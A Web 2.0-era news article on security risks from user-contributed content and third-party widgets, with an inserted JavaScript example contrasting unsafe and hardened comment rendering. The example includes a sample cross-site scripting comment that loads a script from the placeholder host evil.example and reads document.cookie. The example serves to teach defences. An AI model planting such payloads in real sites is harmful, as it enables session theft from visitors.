RealTime IT News

Web 2.0: Unsafe At Any Speed?

Paul Ferguson, a network architect with antivirus vendor Trend Micro, summed up Web 2.0 thus: "We're basically training our online users to be exploited."

He's not the only security expert who feels this way. Researchers who live and breathe malware told InternetNews.com in multiple interviews that the very nature of Web 2.0 technology, and the way it is used, invites malware infection and is virtually impossible to secure.

The laundry list of complaints about Web 2.0 security can be boiled down to two distinct problems: not knowing all of your data sources, and having no control over what may be served up.

"Web 2.0 sites are defined by user collaboration and user input. So whenever you have input from a user that can show up on a Web page to other people, that creates a form of risk," said Jon Orbeton, strategic product manager for IronPort, a developer of gateway filtering hardware.

Bob Buffone, chief architect with Nexaweb, a provider of Web 2.0-based applications for the enterprise, agrees. "From the end user's perspective, this third-party code inclusion -- IFrame, widgets, AJAX -- really breaks the trust relationship with a Web site and end user," he said. "The user comes to a site trusting that the site has done everything to secure their data. They don't know what extends beyond that."

End users can't protect themselves because, from the Web page they are on, they can't see where all of this content is being pulled from. A well-programmed site checks data taken from an outside source when it arrives, and encodes it before it is rendered into a page for the user, so that user-supplied text cannot be interpreted by the browser as markup or script. Programmers call the first step input validation and the second output encoding.

If something from the outside is brought into an application, it needs to be scrubbed for dangerous code. But all too often, data and code are simply grabbed from a variety of sources without the developer checking whether they contain anything malicious. Even sites that were once considered trustworthy are no longer safe to trust.
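The validation-and-scrubbing point above is easiest to see in code. The following is an added example, not code from the article or from any of the vendors it quotes: a profile page that renders a visitor's comment, first the way many early Web 2.0 sites did it (raw string interpolation) and then with input validation on the link field and HTML encoding on everything rendered. The function names, the `comment` object shape and the sample malicious comment are all constructed for this illustration; the `evil.example` host is a placeholder, not a real site.

```javascript
// Added example: rendering user-contributed content on a page other users see.
// All names here are hypothetical; the malicious comment is constructed input.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Output encoding: turn the five HTML-significant characters into entities so the
// browser shows user text as text instead of parsing it as tags or attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// VULNERABLE: user fields are dropped straight into markup. A comment body
// containing a <script> tag, or a link with a javascript: scheme, runs in the
// browser of every visitor who views the page (stored cross-site scripting).
function renderCommentUnsafe(comment) {
  return `<div class="comment"><a href="${comment.url}">${comment.author}</a>: ${comment.body}</div>`;
}

// Input validation for the one field that has a structure we can check:
// accept only absolute http/https URLs, returning null for anything else.
function validateUrl(raw) {
  let u;
  try {
    u = new URL(String(raw));
  } catch {
    return null; // not a parseable absolute URL
  }
  if (u.protocol !== "http:" && u.protocol !== "https:") return null; // rejects javascript:, data:, etc.
  return u.href;
}

// HARDENED: validate on the way in, encode on the way out. A rejected URL
// simply drops the link rather than falling back to the raw value.
function renderCommentSafe(comment) {
  const url = validateUrl(comment.url);
  const author = escapeHtml(comment.author);
  const link = url ? `<a href="${escapeHtml(url)}">${author}</a>` : author;
  return `<div class="comment">${link}: ${escapeHtml(comment.body)}</div>`;
}

// Third-party widgets are a different case: the host page cannot inspect what
// the widget will serve, so it isolates the widget instead of trusting it.
// "allow-scripts" without "allow-same-origin" gives the frame an opaque origin,
// so its script cannot read the host page's DOM or cookies.
function embedWidgetIsolated(widgetUrl) {
  const url = validateUrl(widgetUrl);
  if (!url) throw new Error("widget URL rejected");
  return `<iframe src="${escapeHtml(url)}" sandbox="allow-scripts" referrerpolicy="no-referrer"></iframe>`;
}

// Constructed sample: the kind of "friendly" comment an attacker posts to a profile.
const MALICIOUS_COMMENT = {
  author: "friend",
  url: "javascript:alert(document.cookie)",
  body: '<script src="http://evil.example/steal.js"></script>',
};

// Running the two renderers side by side shows the difference.
console.log(renderCommentUnsafe(MALICIOUS_COMMENT));
console.log(renderCommentSafe(MALICIOUS_COMMENT));
console.log(embedWidgetIsolated("https://widgets.example/clock"));
```

The point of `validateUrl` is that it is an allowlist (only two schemes pass) rather than a search for known-bad strings, which is the form of "scrubbing" that holds up against encodings and variants the developer did not think of. Encoding is applied at render time, not at storage time, because the same stored comment may later be emitted into HTML, into a JSON feed or into an e-mail, each of which needs a different encoding.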

It's the nature of the Web 2.0 beast to bring in data from other sources, which is what makes it fun and at the same time dangerous. "What makes it more dangerous is collaboration. There's so much more data being exposed these days. With GeoCities a decade ago, it was pretty unscriptable. There wasn't much the bad guys could do to harvest information and there was little people put out there," said Randy Abrams, director of technical training for antivirus vendor ESET Software.

"GeoCities was like a bunch of apartments, whereas MySpace is like Times Square, except people are hanging up their dirty laundry and changing in public," he added.

Fortunately, some of the Web 2.0 leaders are beginning to recognize this. When it launched a developer platform earlier this month, MySpace was quite careful to put in many of the security measures that security experts say are needed. This includes code scrubbing and means to prevent code injection.
